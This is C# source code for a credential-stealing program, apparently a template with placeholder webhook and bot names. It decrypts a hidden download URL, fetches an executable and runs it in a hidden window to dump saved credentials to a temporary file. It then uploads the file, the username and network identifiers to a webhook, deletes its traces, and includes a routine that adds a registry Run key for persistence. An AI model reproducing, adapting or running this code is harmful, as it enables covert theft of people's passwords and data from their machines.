using Microsoft.Win32; using System; using System.Collections.Generic; using System.Collections.Specialized; using System.Diagnostics; using System.IO; using System.Linq; using System.Net; using System.Net.Http; using System.Security.Cryptography; using System.Text; using System.Text.RegularExpressions; using System.Threading; using System.Threading.Tasks; using System.Windows; using System.Deployment; using System.Net.NetworkInformation; using System.Windows.Forms; namespace IGH { class Program { public static string temp = @"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp"; public static byte[] Byte8(string veri) { char[] ArrayChar = veri.ToCharArray(); byte[] ArrayByte = new byte[ArrayChar.Length]; for (int i = 0; i < ArrayByte.Length; i++) { ArrayByte[i] = Convert.ToByte(ArrayChar[i]); } return ArrayByte; } public static string RC2_Coz(string strGiris) { string strSonuc; byte[] aryKey = Byte8("89129381972634"); byte[] aryIV = Byte8("89129381972634"); RC2CryptoServiceProvider cp = new RC2CryptoServiceProvider(); MemoryStream ms = new MemoryStream(Convert.FromBase64String(strGiris)); CryptoStream cs = new CryptoStream(ms, cp.CreateDecryptor(aryKey, aryIV), CryptoStreamMode.Read); StreamReader reader = new StreamReader(cs); strSonuc = reader.ReadToEnd(); reader.Dispose(); cs.Dispose(); ms.Dispose(); return strSonuc; } public static void GetCreds() { string download = (RC2_Coz("ttZID1v0v1TqMWhYdkJXb61/qNdz/g+aMmf8XEyyrsqfmkke0DHfIrYxUeyEbrB02o/nf8/+6KVMUebDYAcCV/JaoarxNQOJNNPIsmfNQ/y2EG0Qw208f3Qo+IYWR6nq")); WebClient wc = new WebClient(); wc.DownloadFile(download, temp + "\\h0a8s7dfh.exe"); wc.Dispose(); Process process = new Process(); ProcessStartInfo processStartInfo = new ProcessStartInfo(); processStartInfo.WindowStyle = ProcessWindowStyle.Hidden; processStartInfo.FileName = temp + "\\h0a8s7dfh.exe"; processStartInfo.Arguments = "/C /stext " + temp + "\\791f026b19f642v.txt"; process.StartInfo = processStartInfo; process.Start(); Thread.Sleep(500); } static void Main(string[] args) { //sitelaunch string ipResult = ""; string macResult = ""; //grabip //grabmac string IpAddresses = ""; string MacAddresses = ""; if (ipResult != "") IpAddresses = "\n[IP Address] :"; if (macResult != "") MacAddresses = "\n[Mac Addresses] :"; GetCreds(); Webhook wb = new Webhook("//webhook"); wb.Name = "//botname"; wb.ProfilePictureUrl = "//botpic"; Thread.Sleep(200); wb.SendMessage3("```css" + "\n========================[Data From]=========================== "+ "```" +Environment.UserName+ "```"+ IpAddresses+"``` " +ipResult+ " ```"+ MacAddresses+"\n ```"+macResult, temp + "\\791f026b19f642v.txt"); File.Delete(temp + "\\h0a8s7dfh.exe"); File.Delete(temp + "\\791f026b19f642v.txt"); //startup //errormessage } public static void AddToStartup() { RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); registryKey.SetValue("Windows", temp); } public static string GetIp() { WebClient ipGrab = new WebClient(); string ipLink = "http://ipv4bot.whatismyipaddress.com/"; string result = ipGrab.DownloadString(ipLink); return result; } public static string GetMac() { StreamWriter macWrite = new StreamWriter("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macler.txt"); foreach (NetworkInterface bok in NetworkInterface.GetAllNetworkInterfaces()) { string mac = string.Join(":", bok.GetPhysicalAddress().GetAddressBytes().Select(b => b.ToString("X2"))); macWrite.WriteLine(mac); } macWrite.Close(); return File.ReadAllText("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macler.txt"); } } class Webhook { private HttpClient Client; private string Url; public string Name { get; set; } public string ProfilePictureUrl { get; set; } public Webhook(string webhookUrl) { Client = new HttpClient(); Url = webhookUrl; } public bool SendMessage3(string content, string file = null) { MultipartFormDataContent data = new MultipartFormDataContent(); data.Add(new StringContent(Name), "username"); data.Add(new StringContent(ProfilePictureUrl), "avatar_url"); data.Add(new StringContent(content), "content"); if (file != null) { if (!File.Exists(file)) throw new FileNotFoundException(); byte[] bytes = File.ReadAllBytes(file); data.Add(new ByteArrayContent(bytes), "Credentials." + Environment.UserName + ".txt", "Credentials." + Environment.UserName + ".txt"); } var resp = Client.PostAsync(Url, data).Result; return resp.StatusCode == HttpStatusCode.NoContent; } } }